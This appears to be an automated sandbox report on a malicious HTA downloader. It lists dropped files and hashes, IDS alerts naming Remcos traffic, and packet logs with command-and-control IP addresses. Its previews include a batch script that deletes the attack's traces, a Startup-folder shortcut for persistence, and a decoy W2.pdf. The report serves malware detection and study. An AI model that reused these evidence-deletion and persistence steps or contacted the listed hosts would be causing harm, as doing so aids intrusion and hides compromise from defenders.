                                                                  SHA-256:E0750EDA7DB5FBAF3E93F6887B36CA621EF17366CEE8BDD5820931F5C8E2DAAD
                                                                  SHA-512:8FD019269DCFC16BD9A059F71832EC8747E96E4456CC3E77106EE20556436A338F711D996836330E5D6095417F685EAEC8463819E78E6E1B89017F6350254909
                                                                  Malicious:false
                                                                  Preview:SessionID=5fc7bca0-c495-4bac-87d2-f55afd0e094d.1736269984320 Timestamp=2025-01-07T12:13:04:320-0500 ThreadID=7312 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=5fc7bca0-c495-4bac-87d2-f55afd0e094d.1736269984320 Timestamp=2025-01-07T12:13:04:332-0500 ThreadID=7312 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=5fc7bca0-c495-4bac-87d2-f55afd0e094d.1736269984320 Timestamp=2025-01-07T12:13:04:333-0500 ThreadID=7312 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=5fc7bca0-c495-4bac-87d2-f55afd0e094d.1736269984320 Timestamp=2025-01-07T12:13:04:333-0500 ThreadID=7312 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=5fc7bca0-c495-4bac-87d2-f55afd0e094d.1736269984320 Timestamp=2025-01-07T12:13:04:333-0500 ThreadID=7312 Component=ngl-lib_NglAppLib Description="SetConf

                                                                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):29752
                                                                  Entropy (8bit):5.388358145130854
                                                                  Encrypted:false
                                                                  SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2r5:F
                                                                  MD5:D4E8FE8651B5E1D0A7A6A800D4DFDD25
                                                                  SHA1:0443101F8B1E00AE7EA432643F6EBEA808ED0C08
                                                                  SHA-256:A40531A4F32262A79DD189AC18D2C73BBA6CBC6DA2662BF4D6F7C1B2C7B75C8E
                                                                  SHA-512:CEA568BAB49843F54E0BB80CDE212D36C8F33C2C541715F894C58EC5F405E6F00AA6DEDC85092EB0FE987D5EBEBF82AE4ED24A96163F1967C25356A900BCA4DD
                                                                  Malicious:false
                                                                  Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-

                                                                  C:\Users\user\AppData\Local\Temp\acrocef_low\4c598b25-881e-4c31-b6e0-8806812650ce.tmp

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                  Category:dropped
                                                                  Size (bytes):1407294
                                                                  Entropy (8bit):7.97605879016224
                                                                  Encrypted:false
                                                                  SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                  MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                  SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                  SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                  SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                  Malicious:false
                                                                  Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                  C:\Users\user\AppData\Local\Temp\acrocef_low\6e03f7f0-932b-4094-88c4-717ae8aaa309.tmp

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                  Category:dropped
                                                                  Size (bytes):758601
                                                                  Entropy (8bit):7.98639316555857
                                                                  Encrypted:false
                                                                  SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                  MD5:3A49135134665364308390AC398006F1
                                                                  SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                  SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                  SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                  Malicious:false
                                                                  Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                  C:\Users\user\AppData\Local\Temp\acrocef_low\7030ac90-5569-4fb0-8601-56adcc2e5658.tmp

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                  Category:dropped
                                                                  Size (bytes):386528
                                                                  Entropy (8bit):7.9736851559892425
                                                                  Encrypted:false
                                                                  SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                  MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                  SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                  SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                  SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                  Malicious:false
                                                                  Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                  C:\Users\user\AppData\Local\Temp\acrocef_low\80b46284-9b4f-44ac-ba56-7e8d42f9a514.tmp

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                  Category:dropped
                                                                  Size (bytes):1419751
                                                                  Entropy (8bit):7.976496077007677
                                                                  Encrypted:false
                                                                  SSDEEP:24576:/nZwYIGNPgeWL07oYGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:fZwZG/WLxYGZN3mlind9i4ufFXpAXkru
                                                                  MD5:1F3D69524A9D7E17BD2363C81D130F1A
                                                                  SHA1:C2A4A08839CBA47BEE2B601975F7C4F0CC191091
                                                                  SHA-256:D0FFBEC8502A0BE88A99F6708987658FEBE4CF3B6B79AF219C53EFF6458F9D9D
                                                                  SHA-512:A4CBE7073A7CB4C5E33E1CD903CCD7F24B78A04C037BFA1D90D9A5BBD12AF60E3DFFD6546277D1B765CA1DAC1CDA28D24D3454C81952B72D97CAF84DF395E99A
                                                                  Malicious:false
                                                                  Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                  C:\Users\user\AppData\Local\Temp\cleanup.bat

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\mshta.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):123
                                                                  Entropy (8bit):4.743980843348089
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDCMN2RuXcov2lOt+WfWBKEuB8yAL/VLYzLr5+VovuxVz4y:hWK2vo+cwv8EhL/VLULdqo2xr
                                                                  MD5:F499EEC2ED267670E37C9B9E95939756
                                                                  SHA1:32ED7465C5B0C93ACBB4E19369EB4114A55D6B2A
                                                                  SHA-256:31C66BC2D0699E4443ADD0A4F3E0C90AD3883CEA19B1AE55EE9C717BF9B664A0
                                                                  SHA-512:A931A7C75AB7665603F1BBD81A443D50B79F3E7B2A244D3C4D3277246E00FE40332526D6CF52BE3F32B1294B9BC5476511431D1A819BEE063ECA80330FF991EC
                                                                  Malicious:false
                                                                  Preview:@echo off..timeout /t 10 >nul..del "C:\Users\user\Desktop\downloaded.hta"..del temp.bat..del msword.zip..del cleanup.bat..

                                                                  C:\Users\user\AppData\Local\Temp\download_log.txt

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\mshta.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):120
                                                                  Entropy (8bit):4.514369106333414
                                                                  Encrypted:false
                                                                  SSDEEP:3:jLtzKsTGN8cVzKjA2AGN8+1lg+uZDt+kiE2J5xAIhMn:3tzKAGN8OzKjANGN8QgNNwkn23fhM
                                                                  MD5:D9CAF7EC781CEA5E2621CD6BC7494BFA
                                                                  SHA1:4C169D953752343B7D15A151EEC60572068E95B5
                                                                  SHA-256:8B935EAF174C50ECD0B4863F74817634B97D1369E6A7AD3DFAC67A42BDE1BD68
                                                                  SHA-512:CA168B9186E26732C0B635CE0F262CC4B3149517AAA5A7486A89C9E953AFF9494DADDB3A8FA1648998083F9FB48A02A04343FD6A98C963E52724B066AB281DCF
                                                                  Malicious:false
                                                                  Preview:Download started successfully...Download completed successfully and saved to: C:\Users\user\AppData\Local\Temp\temp.bat

                                                                  C:\Users\user\AppData\Local\Temp\msword.zip

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                  Category:dropped
                                                                  Size (bytes):1294224
                                                                  Entropy (8bit):7.999848840340146
                                                                  Encrypted:true
                                                                  SSDEEP:24576:HHCSIIQlCG6xs6b/dCMnimOP0TBepVjSIZFMw+zK1QAqcqINtBP9:HHo6W6bhniN0TBejtyw7lqIjBV
                                                                  MD5:48CB93BCCBC3F6DBDCADAB99F86F6287
                                                                  SHA1:1677BAD633D8AC0FAD6CF3E888E1AB1E6A3528A7
                                                                  SHA-256:353493A6CABD5220903133D868547BB1D6CFD63CB79C87A26F08D733244F8212
                                                                  SHA-512:76DE57C73D95075D9C9BFED0156D9C6DBA7866E2231C2008AAC61A1899D823F947BD2FC53B437F3827417B99D9A6EB99F290C0514BFFE32A11B60E70614391D7
                                                                  Malicious:true
                                                                  Preview:PK.........%'Z$.V......F......msword.exe..|T.?~.G.l.E...4BP....(qA......f...*.....s...M8Ie=....jkoM..mm...... .J-...5".Y7.*1,.9..3......y......3.g.y~..9.o.X.I.dG2MIj..O......\.........2...,.-^.z.=....;W.X....x...x...[....\.tb^^NI....~..Y..2%..wM.......S~..%..L..c...u....n..ep..4.-..P?'S.%Y-...IZ... I.!I:.p#...O...K.$......|<.5.{w......7....e|...-.aQ...Jd..$-.,........x..t......B4V..0..x..%w.wJ.]WIb..V..........>Pc..i#....k.."..vHR. ....nu...4.m._...p>.w...+.x.@..K.e..|........Wet....:.K....C.....B..wp.,)Zi.......0.6o.I.c6.!c..<.......x./..3&..e...K.K..1...u....|...C!.U...8?s=.f....3.w..om.rD.|..E...9U.g.........r;..p=+.y....0&.....YP..t9i..5...,x...Z.y@......6.0MS.o...5.L2.f..*4..UF.3b.....@.]f`p.,...\3/l..V..2&.C&l.R....~.TZ.[..'x.N<.....I./Z.i.c.N.d...73..xs.[.>I2n.:zwZ.P8.M...N....r.e{.y.......6.j.......6.rK.^.8..msk...<...x..-..*....h.N;...F...I........Q....G.}...V.Y.w.........oA....Z9.....+6.B..D,...@N..|...m>.f.}.m.5.

                                                                  C:\Users\user\AppData\Local\Temp\msword\msword.exe

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1328655
                                                                  Entropy (8bit):7.986603369893745
                                                                  Encrypted:false
                                                                  SSDEEP:24576:Jdh/TQ8lCGwfae/DdysbyC6PW//Epzjuc/9c+OzERQqq0GIxJBv:7wSe/fby9W//EpBe+BxGIfBv
                                                                  MD5:5BF20E8953B3219CD4F60BE10A73509F
                                                                  SHA1:C422DC032EB0A63620DDBDDAAC7B2D7909027A8F
                                                                  SHA-256:B59CBB4DBE800B77D1DCAC6E13FE722816EAE5665D87D05B7C5A206430320F6B
                                                                  SHA-512:2E339930FC909DBFB49985EFC730F6DC09459DF4A690E0AFF14CC4175B7921C4AD5111FCB68287A59526BFE0981B094F19196145279BEAA83AA0B9062B8B8A62
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n...j...B...8............@.................................|2....@.................................4........@..~...............x)......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc...~....@......................@..@.reloc..2............N..............@..B................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\temp.bat

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\mshta.exe
                                                                  File Type:Unicode text, UTF-8 text, with very long lines (904), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):5541
                                                                  Entropy (8bit):5.2664681958555635
                                                                  Encrypted:false
                                                                  SSDEEP:96:CincTy8G+hpQyuPmhDGEhtKCZ+CdvloxEWaqNh3b3Z/OnSZtn5+Gs8HNSqCBXAyY:CincTy8G+hpQyuPmhDGEhtKCLCjaob39
                                                                  MD5:30F0E17A1AD41BCDC9A52049E5DA1884
                                                                  SHA1:FE3996616238A93B458232F693D8A4FE654C66C3
                                                                  SHA-256:7C8949DBD5C68356292318F49EEC561EAFF17E4056101AFA945176F4C9E46398
                                                                  SHA-512:8FE9485BC6DABB862BDC315C980C9E58D9A49D4BD5D616B12C870A5342718544E6ED00D3041787E1C21CD614A968DAF45C3D145742CA768AD49BFA546886D6C7
                                                                  Malicious:true
                                                                  Preview::: .... ... ......... ...... ... .. ...... ... .. ......... ... ....... ..:: ....... ...... . ... ...... .. .... ...... . .... ......... . .... .... .....:: .... ...... ... . .... ..... . ......... .... ................ .... ... ....:: ...... .......... .... . .... ....... ... . ...... ... ....... . .... .... ...:: ... ... .. .... .... . . ..... ......................

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >), ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):100
                                                                  Entropy (8bit):4.889436845812483
                                                                  Encrypted:false
                                                                  SSDEEP:3:HRAbABGQaFyw3pYot+kiE2J5mKIGXQxjNLiqB5Gr4Fy:HRYF5yjowkn23mKpkNx5G0y
                                                                  MD5:A34A0DAF277C13FC5AFF64C0A7247999
                                                                  SHA1:FD9B47B23BD20B9903D8842AC8C17A9F96677E93
                                                                  SHA-256:1534FD0EC0B91D4DDD6A250523DEE4BDB80DCBDF9DF1440606B3BF31AB80E814
                                                                  SHA-512:7B45CB2183C7307EF7C7A89926D2289E5A49C49E53F2A635CFF49FC8898D2D346C686E6DF5F15280A918E6FDA78AE75E97B1769D5536293E75119E3ECDCE0E9A
                                                                  Malicious:true
                                                                  Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" ..

                                                                  C:\Users\user\Downloads\W2.pdf

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:PDF document, version 1.4, 1 pages
                                                                  Category:dropped
                                                                  Size (bytes):393964
                                                                  Entropy (8bit):7.894863553506209
                                                                  Encrypted:false
                                                                  SSDEEP:6144:fz/0MaxA4h4379ErMr1NPe8ThAvXG4e5c8m1TCso1/kWS7uu:fz/0MaqxKy1NkvXG4MpmNokF
                                                                  MD5:57F09EA46C7039EA45BB3FD01BBD8C80
                                                                  SHA1:1365FF5E6E6EFC3E501D350711672F6A232AA9F8
                                                                  SHA-256:3850E8022E3990B709DA7CDDBFD3F830EB86F34AF89D5939E2999C1E7DE9766F
                                                                  SHA-512:6DE0ACD9D03BDE584A7B2C2C7781530BA7504622B518523993311AD6174D2A9890E9D230A2A3A51D76615111A9F62259A9615378440690F20708B201B19A17F8
                                                                  Malicious:true
                                                                  Preview:%PDF-1.4.%......4 0 obj.<</Linearized 1/L 393964/O 6/E 362617/N 1/T 393770/H [ 1316 238]>>.endobj. .xref..4 51..0000000016 00000 n..0000001554 00000 n..0000001614 00000 n..0000002242 00000 n..0000002407 00000 n..0000002915 00000 n..0000003346 00000 n..0000003757 00000 n..0000003803 00000 n..0000005034 00000 n..0000006941 00000 n..0000008869 00000 n..0000010482 00000 n..0000011608 00000 n..0000012618 00000 n..0000012731 00000 n..0000013728 00000 n..0000014512 00000 n..0000014563 00000 n..0000014676 00000 n..0000014801 00000 n..0000029764 00000 n..0000030031 00000 n..0000058294 00000 n..0000058547 00000 n..0000085116 00000 n..0000085374 00000 n..0000094559 00000 n..0000094824 00000 n..0000094951 00000 n..0000095014 00000 n..0000095044 00000 n..0000095120 00000 n..0000113594 00000 n..0000113891 00000 n..0000113954 00000 n..0000114069 00000 n..0000132543 00000 n..0000191838 00000 n..0000192135 00000 n..0000192913 00000 n..0000193209 00000 n..0000196912 00000 n..0000197906 0

                                                                  \Device\Null

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\timeout.exe
                                                                  File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                  Category:dropped
                                                                  Size (bytes):95
                                                                  Entropy (8bit):4.176025638229203
                                                                  Encrypted:false
                                                                  SSDEEP:3:hYFEHgAR+mQRKVxLZtFctFst3g4t32vov:hYFEmaNZM3MXt3X
                                                                  MD5:74D8C80188CB3C2AFD82E1821813B1CB
                                                                  SHA1:EEB1D7DC1821B7841EE50BC53AFF890544ECFBDA
                                                                  SHA-256:970057AABB3408E53F34A42FEF79D515688F7C1BBEA0567C1BF9B477B53F3AC2
                                                                  SHA-512:677341DE20037DD57D34587520DF436CFE3DFB09824AC4926F0BAC3B428B3FACB2007CADC74254879736195E4573D44AB88DE80E52D1A559C7096E7F9587A5BE
                                                                  Malicious:false
                                                                  Preview:..Waiting for 10 seconds, press a key to continue ..... 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

                                                                  Static File Info

                                                                  General

                                                                  File type:HTML document, ASCII text, with CRLF line terminators
                                                                  Entropy (8bit):4.548040738865506
                                                                  TrID:
                                                                  • HyperText Markup Language (12001/1) 40.67%
                                                                  • HyperText Markup Language (11501/1) 38.98%
                                                                  • HyperText Markup Language (6006/1) 20.35%
                                                                  File name:c2.hta
                                                                  File size:5'223 bytes
                                                                  MD5:3a4f0963b57121e55af053325ea89240
                                                                  SHA1:989889d50c78bff05ec5ed3e069bf72e58889c35
                                                                  SHA256:41d88bc4022af4df4b7be44f3de7ff07e5619b2116400eb57460367b85958684
                                                                  SHA512:fd7f39150b5dfb18f1aa1f0e02962f047a6777d4dd32452e1c4656e90b5bd13e374e06a6ead972ac6de0184447f76238b5fbcc3414bb1f686608c2f915a6316e
                                                                  SSDEEP:96:uMkbYizhV1RgcQVx+P50wMmhtbSOyOsluH3:O0s1EMx0wFHlYU
                                                                  TLSH:85B1205FAF83DF725933C426496AAC4DDE98850B1024C045B58C888E7F3537DA8D62F7
                                                                  File Content Preview:<html>..<head>.. <title></title>.. <HTA:APPLICATION.. ID="downloadBatApp".. APPLICATIONNAME="BAT Downloader".. WINDOWSTATE="minimize".. BORDER="thin".. SCROLL="no".. SINGLEINSTANCE="yes".. SHOWINTASKB

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2025-01-07T18:12:57.345392+01002827578ETPRO MALWARE Likely Dropper Doc GET to .moe TLD1192.168.2.449731108.181.20.35443TCP
                                                                  2025-01-07T18:13:00.400496+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.449735193.26.115.39443TCP
                                                                  2025-01-07T18:13:04.344206+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.449738193.26.115.39443TCP
                                                                  2025-01-07T18:13:55.311475+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449756193.26.115.397009TCP
                                                                  2025-01-07T18:13:56.432073+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449758178.237.33.5080TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 7, 2025 18:12:56.096196890 CET49731443192.168.2.4108.181.20.35
                                                                  Jan 7, 2025 18:12:56.096231937 CET44349731108.181.20.35192.168.2.4
                                                                  Jan 7, 2025 18:12:56.096312046 CET49731443192.168.2.4108.181.20.35
                                                                  Jan 7, 2025 18:12:56.125907898 CET49731443192.168.2.4108.181.20.35
                                                                  Jan 7, 2025 18:12:56.125922918 CET44349731108.181.20.35192.168.2.4
                                                                  Jan 7, 2025 18:12:57.043327093 CET44349731108.181.20.35192.168.2.4
                                                                  Jan 7, 2025 18:12:57.043417931 CET49731443192.168.2.4108.181.20.35
                                                                  Jan 7, 2025 18:12:57.124852896 CET49731443192.168.2.4108.181.20.35
                                                                  Jan 7, 2025 18:12:57.124872923 CET44349731108.181.20.35192.168.2.4
                                                                  Jan 7, 2025 18:12:57.125186920 CET44349731108.181.20.35192.168.2.4
                                                                  Jan 7, 2025 18:12:57.125263929 CET49731443192.168.2.4108.181.20.35
                                                                  Jan 7, 2025 18:12:57.163829088 CET49731443192.168.2.4108.181.20.35
                                                                  Jan 7, 2025 18:12:57.207329988 CET44349731108.181.20.35192.168.2.4
                                                                  Jan 7, 2025 18:12:57.345413923 CET44349731108.181.20.35192.168.2.4
                                                                  Jan 7, 2025 18:12:57.345437050 CET44349731108.181.20.35192.168.2.4
                                                                  Jan 7, 2025 18:12:57.345473051 CET49731443192.168.2.4108.181.20.35
                                                                  Jan 7, 2025 18:12:57.345494032 CET44349731108.181.20.35192.168.2.4
                                                                  Jan 7, 2025 18:12:57.345510960 CET44349731108.181.20.35192.168.2.4
                                                                  Jan 7, 2025 18:12:57.345510960 CET49731443192.168.2.4108.181.20.35
                                                                  Jan 7, 2025 18:12:57.345550060 CET49731443192.168.2.4108.181.20.35
                                                                  Jan 7, 2025 18:12:57.368654966 CET49731443192.168.2.4108.181.20.35
                                                                  Jan 7, 2025 18:12:57.368673086 CET44349731108.181.20.35192.168.2.4
                                                                  Jan 7, 2025 18:12:59.675587893 CET49735443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:12:59.675630093 CET44349735193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:12:59.675698042 CET49735443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:12:59.684427977 CET49735443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:12:59.684442997 CET44349735193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:00.249224901 CET44349735193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:00.249399900 CET49735443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:00.255476952 CET49735443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:00.255486012 CET44349735193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:00.255722046 CET44349735193.26.115.39192.168.2.4
